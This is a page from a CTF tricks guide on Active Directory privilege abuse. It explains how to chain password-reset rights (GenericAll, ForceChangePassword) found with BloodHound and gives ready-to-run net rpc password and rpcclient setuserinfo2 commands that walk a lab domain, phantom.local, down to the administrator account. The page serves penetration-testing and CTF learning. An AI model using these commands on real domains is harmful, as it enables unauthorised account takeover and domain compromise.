> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-8/active-directory/lateral-movement-active-directory-privilege-abuse.md).

# Privilege Abuse

## Chaining AD Permissions for Password Reset

Identify Active Directory permission chains where one user (User A) has rights (like `GenericAll` or `ForceChangePassword`) to reset another user's (User B) password, and User B similarly has rights on User C, and so on. Tools like BloodHound can help visualize these "Transitive Object Control" paths.

Once a chain is identified, use the `net rpc password` command (from `samba-client`) to perform the resets sequentially down the chain. The `net` utility is a tool for administration of Samba and remote CIFS servers. To change a password for a user on a samba server (acting as a domain controller), you can use the following command:

```bash
net rpc password USERNAME NEWPASSWORD [-S server] [-U username[%password]] [-W workgroup] [-I ip-address] [-P] [-c client-signing] [-C client-protection] [-k kerberos]
```

Replace `USERNAME` with the user whose password you want to change, `NEWPASSWORD` with the desired new password. The `-S server` option specifies the server to connect to. `-U username[%password]` specifies the username and optional password to connect as. `-W workgroup` specifies the workgroup or domain. `-I ip-address` specifies the destination IP address.

Applying this to the chain, first, reset User B's password using User A's credentials:

```bash
net rpc password 'USER_B' 'NewPasswordForB' -U domain/'USER_A'%'UserA_Password' -S $TargetServerIP
```

Then, use User B's *newly set* credentials to reset the next user's password in the chain. For instance, using the found credentials for a user like `svc_jenkins`, you can reset the password for `svc_docker`:

```bash
net rpc password 'svc_docker' 'NewPassword123!' -U phantom.local/'svc_jenkins'%'OldPassword123!' -S 10.10.10.100
```

Now, using the newly set password for `svc_docker`, you can proceed to reset the password for another account further down the chain, such as the `administrator` account:

```bash
net rpc password 'administrator' 'AnotherNewPassword!' -U phantom.local/'svc_docker'%'NewPassword123!' -S 10.10.10.100
```

Alternatively, you can use `rpcclient`, which is a tool for executing client side MS-RPC functions. The `rpcclient` command can also be used to change passwords, often employing the `setuserinfo2` command with level 23. The syntax for `setuserinfo2` is `setuserinfo2 <user> <level> <info>`. Using level 23 allows changing the password.

An example using `rpcclient` to reset a password:

```bash
rpcclient -U 'phantom.local\svc_jenkins%OldPassword123!' 10.10.10.100 -c 'setuserinfo2 svc_docker 23 NewPassword123!'
```

This command connects to the server at `10.10.10.100` using the credentials `phantom.local\svc_jenkins` with the password `OldPassword123!` and executes the `setuserinfo2` command to change the password for the user `svc_docker` to `NewPassword123!` using level 23.

Continue this process down the discovered chain until the target account is compromised.
